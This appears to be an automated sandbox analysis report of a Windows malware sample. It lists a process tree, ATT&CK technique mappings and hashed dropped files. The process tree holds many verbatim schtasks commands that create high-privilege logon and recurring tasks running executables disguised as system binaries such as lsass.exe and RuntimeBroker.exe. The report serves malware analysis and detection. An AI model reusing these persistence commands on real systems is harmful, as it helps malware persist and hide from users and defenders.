"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3980,i,4778049104057176787,6631751660692402210,262144 --variations-seed-version --mojo-platform-channel-handle=3760 /prefetch:8
1⤵
PID:3920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\containerperf\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\containerperf\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\containerperf\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 8 /tr "'C:\Users\Default\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Default\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Users\Default\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3200

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Default User\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\containerperf\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\containerperf\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\containerperf\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1288

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\containerperf\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4696

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\containerperf\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\containerperf\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\it-IT\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\it-IT\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\it-IT\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Uninstall Information\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4416

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Program Files\Uninstall Information\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Windows\INF\wsearchidxpi\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:528

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\INF\wsearchidxpi\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4640

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Windows\INF\wsearchidxpi\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\containerperf\SearchApp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\containerperf\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 9 /tr "'C:\containerperf\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4412

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\containerperf\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\containerperf\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\containerperf\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\msedge.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3192

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\msedge.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\msedge.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2564

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Videos\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\Admin\Videos\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4076

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Videos\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Videos\sysmon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Users\Public\Videos\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Videos\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\containerperf\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\containerperf\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\containerperf\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:572

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5124

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:1584

C:\Users\Public\Videos\sysmon.exe
C:\Users\Public\Videos\sysmon.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4348

C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\unsecapp.exe
"C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\unsecapp.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5164

C:\Program Files\Uninstall Information\RuntimeBroker.exe
"C:\Program Files\Uninstall Information\RuntimeBroker.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1404,i,4778049104057176787,6631751660692402210,262144 --variations-seed-version --mojo-platform-channel-handle=4532 /prefetch:8
1⤵
PID:3888

C:\Program Files\Windows Multimedia Platform\lsass.exe
"C:\Program Files\Windows Multimedia Platform\lsass.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1512

C:\Users\Admin\Videos\backgroundTaskHost.exe
C:\Users\Admin\Videos\backgroundTaskHost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4832

C:\containerperf\SearchApp.exe
C:\containerperf\SearchApp.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6000

C:\Users\Public\Videos\sysmon.exe
C:\Users\Public\Videos\sysmon.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6016

C:\Program Files (x86)\Mozilla Maintenance Service\logs\msedge.exe
"C:\Program Files (x86)\Mozilla Maintenance Service\logs\msedge.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1776

C:\containerperf\dllhost.exe
C:\containerperf\dllhost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6028

C:\Windows\INF\wsearchidxpi\Idle.exe
C:\Windows\INF\wsearchidxpi\Idle.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2948

C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\unsecapp.exe
"C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\unsecapp.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3208

C:\Program Files\Uninstall Information\RuntimeBroker.exe
"C:\Program Files\Uninstall Information\RuntimeBroker.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2784

C:\containerperf\fontdrvhost.exe
C:\containerperf\fontdrvhost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1008

C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3344

C:\Users\Public\Videos\sysmon.exe
C:\Users\Public\Videos\sysmon.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3424

C:\Program Files\Windows Multimedia Platform\lsass.exe
"C:\Program Files\Windows Multimedia Platform\lsass.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6100

C:\Users\Admin\Videos\backgroundTaskHost.exe
C:\Users\Admin\Videos\backgroundTaskHost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3636

C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\unsecapp.exe
"C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\unsecapp.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3580

C:\Program Files\Uninstall Information\RuntimeBroker.exe
"C:\Program Files\Uninstall Information\RuntimeBroker.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5540

C:\containerperf\SearchApp.exe
C:\containerperf\SearchApp.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:392

C:\Program Files (x86)\Mozilla Maintenance Service\logs\msedge.exe
"C:\Program Files (x86)\Mozilla Maintenance Service\logs\msedge.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1440

C:\Users\Public\Videos\sysmon.exe
C:\Users\Public\Videos\sysmon.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5388

C:\containerperf\dllhost.exe
C:\containerperf\dllhost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4572

C:\Windows\INF\wsearchidxpi\Idle.exe
C:\Windows\INF\wsearchidxpi\Idle.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1600

C:\Program Files\Windows Multimedia Platform\lsass.exe
"C:\Program Files\Windows Multimedia Platform\lsass.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4776

C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\unsecapp.exe
"C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\unsecapp.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4764

C:\Program Files\Uninstall Information\RuntimeBroker.exe
"C:\Program Files\Uninstall Information\RuntimeBroker.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3504

C:\Users\Public\Videos\sysmon.exe
C:\Users\Public\Videos\sysmon.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3668

C:\containerperf\fontdrvhost.exe
C:\containerperf\fontdrvhost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5888

C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1868

C:\Users\Admin\Videos\backgroundTaskHost.exe
C:\Users\Admin\Videos\backgroundTaskHost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:944

C:\containerperf\SearchApp.exe
C:\containerperf\SearchApp.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5236

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\backgroundTaskHost.exe.log

Filesize
1KB

MD5
baf55b95da4a601229647f25dad12878

SHA1
abc16954ebfd213733c4493fc1910164d825cac8

SHA256
ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

SHA512
24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
750e4be22a6fdadd7778a388198a9ee3

SHA1
8feb2054d8a3767833dd972535df54f0c3ab6648

SHA256
26209c196c9c45202d27468ea707b2b46f375bb612d50271924a28f9210df6a1

SHA512
b0415087dfc32908b449b876b395a607698b0f7b72031916b6fe7c002e4b163ba318b7e85c8ce41f007429e666974c04967bc14345e3f4614e34d94f5c8ae804

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Temp\140e8bcf-5b16-48c2-a480-7ab12e80722e.vbs

Filesize
708B

MD5
af62d329032a8bb5dddd01bb6812e6c3

SHA1
fcacdb7124f3d39e9bcd21f4a11cade6f6da9105

SHA256
aa718631612baf3943d17cde8ab1d55b2410546b8fc2fb1d50ec03c6cb59ec3e

SHA512
80c7af1442ee4f2f21ad41145ac5a85b054f23173d8866d47baa379f63014a72b91551c7a77ae68b25bff85cbece8133aedf909eb8070fb634ac27236304d78a

Download Submit
C:\Users\Admin\AppData\Local\Temp\2e60d99d-303b-4e2d-b798-0bae83d12f62.vbs

Filesize
484B

MD5
c6450e71df4c18f01bd0e3ddf245afdb

SHA1
acf7ebb520a4b47025780248394eb97112e5b295

SHA256
6917f30c3440787d31e9150283dc84089fab294dbb05ccb009c112234993667b

SHA512
f87942178c4613cca669d1fe3c30a2f3922070b0b7814da9ebec9364757969aa1414a857d7ed3ebf16c9accfaadea8bbf14f494734375684080bcc33833c8b8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0edygnwi.jja.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\l7sOuyFVLN.bat

Filesize
197B

MD5
f965ef3f9bb69fce633d97f5d557b88b

SHA1
5cf684aac4c6b38c50d47b102594848031f35e03

SHA256
de459c41ecc8a3b11392e1466bac5a85d40753334eb739ebb7f571b8da993bd0

SHA512
0a325bce24139580d8f1f578b37f482b1abb9e6b9be4903de7bac4a0ca48aa4afd4124cd9eb16acad25b395d0b10e0972ad37c834b89ced14262058abdd21733

Download Submit
C:\containerperf\9nepdzd6Yg.vbe

Filesize
226B

MD5
fd73bba1ae261c1bde0a83ff425994c4

SHA1
7e9e51cef1374547c885b6e8bd62ed2a1dc6902b

SHA256
16f04c862e66dbdf8631baaa3c37e771281f59d68d60420d4dac89701c1fb732

SHA512
20644ded806f97cdd62b136fa4cd6bff7ed61d8c4f6d533dee3c71d3f12923243551e910f56d4504a0c67a89a3e50064fa8f53cb3b307150cf185c9016e004e4

Download Submit
C:\containerperf\Hyperblockport.exe

Filesize
2.9MB

MD5
a5eb91d9ffb09e43c86d3ac84354107f

SHA1
ab225fd443f3c209c4493e1dd823093c87364075

SHA256
13da0ed8f7f0cfbf7187ae5d3fe222a0aac5a0fad6e0c1f011f0ef3f8d126906

SHA512
3259e901d0347db552f658f89c11c711f328831a5da203b18e8383740a202b87aea4a2c84c33d3ca6d9a8200d1f933f8820379a7b77e094c005a004c9f3c59ee

Download Submit
C:\containerperf\MJF5L0LGrR45RopQV75MoqBbC.bat

Filesize
48B

MD5
7a122e2bf760c3ba657e5ba59337bce2

SHA1
e9ac1ad5c6b04628fdea1a0657f0e466a2a06261

SHA256
b9469f10268a8e4a44814d71f3eb6530f2a4970933b586f6dc5e3eebb2fe33f8

SHA512
89912e65857c9975e0c6ab2b3ea94f07547cba9e875b7db26dc87a6d2ec8ba79b9aa7421a78f8203587ffc70fe39df2c8fc95566c47d4681fa59f933129c6c64

Download Submit
memory/904-20-0x000000001AFF0000-0x000000001AFFC000-memory.dmp

Filesize
48KB

Download
memory/904-25-0x000000001BD20000-0x000000001C248000-memory.dmp

Filesize
5.2MB

Download
memory/904-28-0x000000001B190000-0x000000001B19C000-memory.dmp

Filesize
48KB

Download
memory/904-29-0x000000001BA20000-0x000000001BA28000-memory.dmp

Filesize
32KB

Download
